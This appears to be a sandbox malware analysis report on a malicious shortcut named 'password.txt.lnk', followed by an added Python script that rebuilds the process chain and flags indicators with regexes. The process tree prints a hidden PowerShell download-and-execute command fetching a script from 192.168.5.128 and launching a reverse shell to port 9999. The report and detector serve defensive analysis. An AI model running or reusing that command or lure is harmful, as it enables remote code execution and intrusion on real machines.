Analysis

max time kernel: 1579s
max time network: 1578s
platform: windows7_x64
resource: win7v20201028
submitted: 15-01-2021 21:00

Static task: static1
Behavioral task: behavioral1
Sample: password.txt.lnk
Resource: win7v20201028
0 signatures, 0 seconds
General

Target: password.txt.lnk
Size: 701B
MD5: 954d37bb7d20be351e2aeb89ba70a79c
SHA1: eca297fe4ad255ea9bd53294a3da3c449c17551f
SHA256: e927ad9f7f2787687004afe8687f28409d282f4a63d8840661345126c7b8f14e
SHA512: 37cc8f55ffa4c2e9ad65e7afaa82d726ec811e521eb9771300d066f600348ba5fbf5771f834ae9dbe4df0e2dc7511b4e0d741c164315327333812181ff37cf67
Score: 10/10
Malware Config

Extracted
Language: ps1
Source: URLs
ps1.dropper: http://192.168.5.128:8000/svchost.ps1
Signatures

Drops file in System32 directory (1 IoC)
Processes:
  description                    ioc                                                                                                                            process
  File opened for modification   C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk   powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid    process
  2024   powershell.exe
  2024   powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description               pid    process
  Token: SeDebugPrivilege   2024   powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs; each event below was recorded three times)
Processes:
  description                        pid    process          target process
  PID 1204 wrote to memory of 2016   1204   cmd.exe          cmd.exe
  PID 2016 wrote to memory of 2024   2016   cmd.exe          powershell.exe
  PID 2024 wrote to memory of 1520   2024   powershell.exe   svchost.exe
Processes

1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"
         - Drops file in System32 directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\svchost.exe
            "C:\Windows\system32\svchost.exe" -c 192.168.5.128 -p 9999 -e cmd
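The process tree and the WriteProcessMemory events above contain everything an analyst needs to reconstruct the chain (cmd.exe launching the .lnk, a second cmd.exe, powershell.exe, then svchost.exe) and to pull indicators out of the command lines: the in-memory download cradle `IEX(New-Object System.Net.WebClient).DownloadString(...)`, the `-w hidden` window flag, the double extension `password.txt.lnk` (Explorer hides `.lnk`, so the lure displays as `password.txt`), and the netcat-style `-c 192.168.5.128 -p 9999 -e cmd` arguments that point at a reverse shell on port 9999. The Python below is an added example, not part of the sandbox report or of the sample; its input is the events and command lines copied from this report (deduplicated), and the regexes and flag names are this example's own heuristics, not sandbox signatures. The svchost check relies on the fact that a genuine svchost.exe is started by services.exe with a `-k <group>` argument.

```python
"""Rebuild the process chain from a sandbox report's WriteProcessMemory events
and flag the PowerShell download cradle / reverse-shell arguments on the
command lines. Example code, not part of the report or the sample."""
import re

# Constructed input: the WriteProcessMemory events from the report above,
# deduplicated. Each entry is (source pid, source image, target pid, target image).
WPM_EVENTS = [
    (1204, "cmd.exe", 2016, "cmd.exe"),
    (2016, "cmd.exe", 2024, "powershell.exe"),
    (2024, "powershell.exe", 1520, "svchost.exe"),
]

# Constructed input: the command lines from the report's process tree, keyed by pid.
COMMAND_LINES = {
    1204: r'''cmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk''',
    2016: r'''"C:\Windows\System32\cmd.exe" /c powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"''',
    2024: r'''powershell -w hidden -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128:8000/svchost.ps1');svchost -c 192.168.5.128 -p 9999 -e cmd"''',
    1520: r'''"C:\Windows\system32\svchost.exe" -c 192.168.5.128 -p 9999 -e cmd''',
}

# Heuristic patterns (this example's own choices, not from the report).
CRADLE_RE = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# netcat-style "connect to host, port, execute program" arguments.
REVSHELL_RE = re.compile(r"-c\s+(\d{1,3}(?:\.\d{1,3}){3})\s+-p\s+(\d{1,5})\s+-e\s+([\w.]+)")
# A document-looking extension followed by .lnk; Explorer hides .lnk, so this shows as password.txt.
DOUBLE_EXT_LNK_RE = re.compile(r"\.\w{2,4}\.lnk\b", re.I)


def build_chain(events):
    """Order the events into a root-to-leaf list of (pid, image).
    Assumes a linear chain (each process writes into at most one child), as here."""
    child_of = {src: dst for src, _, dst, _ in events}
    images = {}
    for src, src_img, dst, dst_img in events:
        images[src], images[dst] = src_img, dst_img
    targets = {dst for _, _, dst, _ in events}
    roots = [pid for pid in child_of if pid not in targets]
    if len(roots) != 1:
        raise ValueError(f"expected exactly one root process, found {roots}")
    chain = [roots[0]]
    while chain[-1] in child_of:
        chain.append(child_of[chain[-1]])
    return [(pid, images[pid]) for pid in chain]


def analyse(events, cmdlines):
    """Walk the chain and return per-pid flags plus the extracted IoCs."""
    parent_image = {dst: src_img for src, src_img, dst, _ in events}
    result = {"chain": build_chain(events), "flags": {}, "urls": set(), "c2": None}
    for pid, image in result["chain"]:
        cmd = cmdlines.get(pid, "")
        flags = []
        if CRADLE_RE.search(cmd):
            flags.append("download_cradle")
        if HIDDEN_RE.search(cmd):
            flags.append("hidden_window")
        if DOUBLE_EXT_LNK_RE.search(cmd):
            flags.append("double_extension_lnk")
        # svchost.exe is normally a child of services.exe started with "-k <group>";
        # any other parent (here powershell.exe) is worth an alert on its own.
        if image.lower() == "svchost.exe" and parent_image.get(pid, "").lower() != "services.exe":
            flags.append("svchost_unexpected_parent")
        m = REVSHELL_RE.search(cmd)
        if m:
            flags.append("reverse_shell_args")
            result["c2"] = (m.group(1), int(m.group(2)), m.group(3))
        result["urls"].update(URL_RE.findall(cmd))
        result["flags"][pid] = flags
    return result


if __name__ == "__main__":
    r = analyse(WPM_EVENTS, COMMAND_LINES)
    print(" -> ".join(f"{img}({pid})" for pid, img in r["chain"]))
    for pid, flags in r["flags"].items():
        print(pid, ", ".join(flags) or "-")
    print("dropper URLs:", sorted(r["urls"]))
    if r["c2"]:
        print("reverse shell to %s:%d running %s" % r["c2"])
```

Run stand-alone it prints the chain `cmd.exe(1204) -> cmd.exe(2016) -> powershell.exe(2024) -> svchost.exe(1520)`, the flags per pid, the dropper URL and the 192.168.5.128:9999 endpoint. The same regexes work on Sysmon event ID 1 or 10 CommandLine fields; the `-c host -p port -e program` pattern is deliberately narrow so that PowerShell's own `-c "<script>"` does not trip it.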
Downloads

memory/1520-10-0x0000000000000000-mapping.dmp
memory/2016-2-0x0000000000000000-mapping.dmp
memory/2024-3-0x0000000000000000-mapping.dmp
memory/2024-4-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmp (Filesize 9.9MB)
memory/2024-5-0x0000000002410000-0x0000000002411000-memory.dmp (Filesize 4KB)
memory/2024-6-0x000000001AC10000-0x000000001AC11000-memory.dmp (Filesize 4KB)
memory/2024-7-0x0000000002650000-0x0000000002651000-memory.dmp (Filesize 4KB)
memory/2024-8-0x00000000025B0000-0x00000000025B1000-memory.dmp (Filesize 4KB)
memory/2024-9-0x000000001B640000-0x000000001B641000-memory.dmp (Filesize 4KB)